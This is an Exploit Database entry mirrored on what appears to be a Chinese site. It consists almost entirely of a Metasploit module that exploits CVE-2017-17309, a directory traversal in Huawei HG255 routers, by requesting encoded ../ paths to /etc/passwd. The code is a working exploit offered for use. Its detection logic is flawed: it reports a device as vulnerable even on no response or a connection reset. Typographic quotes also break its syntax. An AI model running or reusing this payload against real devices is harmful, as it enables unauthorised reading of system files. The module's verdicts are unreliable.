Huawei HG255 – Directory Traversal (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Ismail Tasdelen
  日期： 2020-01-15
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47923/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  #
  ##
  
  
  class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
  
   def initialize
   super(
   'Name'=> 'Huawei HG255 Directory Traversal',
   ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
   ‘Author’=> ‘Ismail Tasdelen’,
   ‘License’ => MSF_LICENSE,
   ‘References’ =>
   [
  ['CVE', '2017-17309' ],
  ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
   ]
   )
   register_options(
   [
   Opt::RPORT(80)
   ], self.class
   )
   end
  
   def run
   urllist=[
   ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
   ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
   ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
   ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]
  
   urllist.each do |url|
   begin
   res = send_request_raw(
   {
   ‘method’=> ‘GET’,
   ‘uri’=> url
   })
  
   if res
   print_good(“Vulnerable! for #{url}”)
   else
   print_status(“Vulnerable(no response) detected for #{url}”)
   end
   rescue Errno::ECONNRESET
   print_status(“Vulnerable(rst) detected for #{url}”)
   rescue Exception
   print_error(“Connection failed.”)
   end
   end
   end